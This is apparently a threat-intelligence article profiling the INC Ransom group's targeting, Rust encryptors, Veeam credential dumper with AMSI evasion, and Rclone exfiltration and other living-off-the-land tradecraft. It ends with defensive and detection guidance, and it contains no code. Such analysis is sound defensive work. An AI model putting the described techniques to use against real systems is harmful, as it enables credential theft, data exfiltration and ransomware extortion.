INC Ransom has been operating since August 2023. After nearly three years and more than 830 confirmed victims, it remains a ransomware group that security teams underestimate relative to its actual activity level. It doesn’t generate the same coverage volume as LockBit or RansomHub, it doesn’t operate a public-facing affiliate recruitment programme, and it avoids the kinds of high-profile provocations that bring sustained law enforcement attention. What it does instead is execute methodical, high-dwell-time intrusions against healthcare, legal, manufacturing, and financial services organisations, with a technical toolkit that has quietly improved over the past eighteen months.
The group’s 2025 transition to Rust-based encryptors for both Windows and Linux/ESXi environments, combined with an updated version of a modified Veeam credential extractor, represents the kind of capability investment that warrants more structured defensive attention than INC typically receives.
Background and Targeting
INC Ransom first appeared on eCrime forums in mid-2023 and claimed its first victims shortly after. The group operates as a ransomware-as-a-service outfit, with a core team maintaining the encryptor and tooling while affiliates handle initial access and intrusion. This structure is broadly consistent with other mature RaaS operations, but INC’s affiliate recruitment appears to be more controlled than open platforms like RansomHub — there is no public affiliate portal, and recruitment appears to happen through vetted introductions.
Sector focus has been consistent throughout the group’s existence: healthcare and hospital networks (where backup destruction maximises pressure), professional and legal services (where litigation data provides leverage), manufacturing and industrial services, and financial services firms. The healthcare sector has attracted disproportionate attention — INC’s March 2024 attack on NHS Scotland’s WannaCry-era IT infrastructure resulted in the theft of approximately 3TB of patient data, an incident that attracted UK government response and considerable media coverage.
By Q1 2026, independent tracking across multiple threat intelligence platforms placed INC among the five most prolific ransomware groups by victim count, with ransom demands ranging from several hundred thousand to multiple millions depending on revenue of the target organisation.
The Technical Toolkit
Rust Encryptors: Windows and Linux/ESXi
INC’s original encryptor was written in C++, consistent with many RaaS toolkits of its generation. In late 2024, the group deployed rewritten Rust-based encryptors for both Windows and Linux environments, the latter specifically targeting VMware ESXi hypervisors. The Rust rewrite is operationally significant for three reasons.
First, Rust-compiled binaries produce executables with limited runtime dependencies and relatively limited debug information — both of which complicate static analysis. Second, Rust’s memory safety model, while not directly relevant to encryption speed, means the encryptor avoids certain classes of bug that can cause execution failures at scale. Third, cross-compilation in Rust is straightforward, enabling the development team to maintain a single codebase for the Windows and Linux variants, reducing the maintenance overhead of parallel codebases.
The encryption scheme uses AES-128-CTR for file content with RSA-2048 for key wrapping — a standard hybrid scheme that is cryptographically sound and produces no recoverable decryption path without the private key held by the operator. The Linux variant specifically targets .vmdk, .vmem, .vswp, and .vmsn files — the VMware-specific extensions corresponding to virtual disk images, memory snapshots, swap files, and snapshots respectively. Encrypting these files renders the entire VM fleet inoperable without restoring from external backup.
Veeam DPAPI Credential Dumper
Veeam Backup & Replication has been a consistent target for ransomware operators because it stores credentials for every backed-up system — typically the most privileged service accounts in the environment. If an operator can extract those credentials, they have direct authentication capability against every system Veeam is protecting.
Veeam encrypts stored credentials using DPAPI (Data Protection API), which ties the encryption to the service account running the Veeam service. The original Veeam-Get-Creds.ps1 script, published as a proof-of-concept by security researcher Youssef Sammouda in 2023, demonstrated that DPAPI-encrypted credentials could be extracted by a process running in the same session context. INC has been using a modified version of this script since at least early 2024.
The 2025 update to INC’s version addresses two defensive measures that organisations had begun deploying in response to earlier versions: the updated script handles newer Veeam versions and includes obfuscation that bypasses AMSI (Antimalware Scan Interface) string matching used by security products to flag the original script’s content. The extraction requires either SYSTEM or local administrator access on the Veeam backup server — which INC achieves via lateral movement before deploying the tool.
The practical outcome is that a successful INC intrusion that reaches the Veeam server can produce a plaintext credential list for every host in the backup inventory, typically including domain administrator accounts.
Living-Off-the-Land Execution
INC consistently uses legitimate tools to minimise the footprint of the intrusion before encryption. The pattern has been documented across multiple incident responses:
RDP for lateral movement. Rather than deploying custom lateral movement tooling, INC operators use Remote Desktop Protocol with stolen credentials — a technique that is both effective and difficult to distinguish from legitimate administrator activity in environments without behavioural baselining.
PsExec for execution. Remote execution of tools and payloads uses PsExec, the Sysinternals utility. Combined with stolen credentials, this enables execution on remote hosts without deploying an additional agent.
Cobalt Strike for C2. INC’s persistent access uses Cobalt Strike Beacon, typically deployed as a reflective DLL in memory. Some incident responses have documented the use of AnyDesk and ScreenConnect (legitimate remote access tools) as secondary C2 channels — a technique that maintains connectivity if the Cobalt Strike infrastructure is blocked or detected.
7-Zip and Rclone for exfiltration. Data is staged using 7-Zip (often with password-protected archives to prevent content inspection) and exfiltrated using Rclone, configured to push to cloud storage providers. Rclone’s legitimate use as a synchronisation tool means it is frequently permitted through network controls and doesn’t generate alerts in environments without DLP.
Initial Access Methods
INC’s initial access has varied across documented incidents. The most common vectors are phishing with credential harvesting or initial access through purchased stolen credentials, followed by exploitation of internet-facing VPN appliances and remote access services. The group has also been observed exploiting publicly disclosed vulnerabilities in enterprise applications during patch windows — specifically targeting healthcare and manufacturing environments that operate longer patching cycles due to uptime requirements.
Dwell Time and Operational Tempo
INC operates with deliberate patience before deploying encryption. Incident response data indicates a typical dwell time of two to four weeks between initial access and encryption — enough time to establish multiple persistence mechanisms, complete lateral movement, identify backup infrastructure, and exfiltrate valuable data for the double-extortion element.
The group runs a leak site at an onion address that has been stable since 2024, where stolen data is published for organisations that do not pay. Notably, INC has demonstrated willingness to publish NHS patient data despite the apparent reputational risk, suggesting either that the operator does not believe this will materially affect future victims’ payment decisions, or that the operator does not care about this category of consequence.
Osiris: A Possible Affiliate Overlap
In January 2026, Symantec’s Threat Hunter Team published analysis of a ransomware operation they named Osiris. The group had attacked a large Southeast Asian conglomerate — Symantec’s description is consistent with a diversified industrial holdings company — using a BYOVD (Bring Your Own Vulnerable Driver) technique to terminate endpoint detection and response software before deploying encryption.
The BYOVD component used the Poortry driver, a kernel driver previously observed in attacks attributed to groups with connections to the former UNC3944/Scattered Spider ecosystem. This driver is used specifically to unload security kernel modules — an operation that requires kernel-level execution which legitimate software cannot perform.
Symantec’s analysis noted code-level similarities between the Osiris encryptor and INC’s encryptor, suggesting either shared codebase — consistent with an affiliate relationship — or direct reuse of code obtained from the INC core team. The exact relationship is unclear from public information, but the overlap warrants treating Osiris campaigns as potentially sharing intelligence value with INC targeting patterns.
Defensive Priorities
Protect the Veeam server as a tier-0 asset. If Veeam is running in the environment, the server hosting it should have the same protection as a domain controller. Access should be restricted to dedicated administrator accounts, the server should have an EDR deployment with tamper protection enabled, and PowerShell execution should be constrained and monitored. Specifically, AMSI logging and Script Block Logging should be enabled to catch execution of the Veeam credential dumper even when AMSI real-time detection is bypassed.
Monitor RDP lateral movement. Establish baselines for RDP connections between internal hosts. Lateral movement via RDP from workstations to servers, or between servers, is abnormal in most environments. Alert on RDP connections originating from hosts that do not routinely use RDP, and on credential reuse across multiple systems in a short time window.
Detect Rclone configuration and execution. Rclone configured for cloud sync to providers like Mega, Backblaze B2, or Wasabi, particularly when installed under a non-standard path or with a configuration file created during working hours, is an indicator of staging for exfiltration. Process creation monitoring for rclone.exe with sync or copy subcommands and remote cloud destinations should generate alerts in environments where Rclone is not part of standard operations.
ESXi backup and network isolation. ESXi hosts should be managed via isolated management networks, with vCenter access restricted to dedicated admin workstations. The management network should be isolated from the production network to prevent lateral movement from a compromised Windows host to the ESXi layer. Backups of VM images should be stored on infrastructure not accessible from the production Windows domain.
Segment backup infrastructure at the network layer. The Veeam backup server’s network access should be restricted to only the hosts it backs up and the storage target. It should not be reachable from general user workstations or from the internet.
Assessing the Threat
INC Ransom represents a mature, technically capable RaaS operation that has operated continuously for nearly three years without the kind of disruption that affected LockBit, Hive, or BlackCat. The combination of a Rust-based cross-platform encryptor, an updated Veeam credential dumper, and disciplined LOLBin usage creates an adversary that is harder to detect mid-intrusion and harder to recover from post-encryption than many organisations’ current defences are calibrated for.
The healthcare sector’s continued appearance in INC’s victim list despite the reputational and political costs of those attacks suggests the group has made a deliberate calculation that the operational pressure healthcare targets face — and the value of the data they hold — outweighs any inhibition from public attention. For defenders in that sector, INC’s TTPs should be a priority input into detection engineering and tabletop exercise design.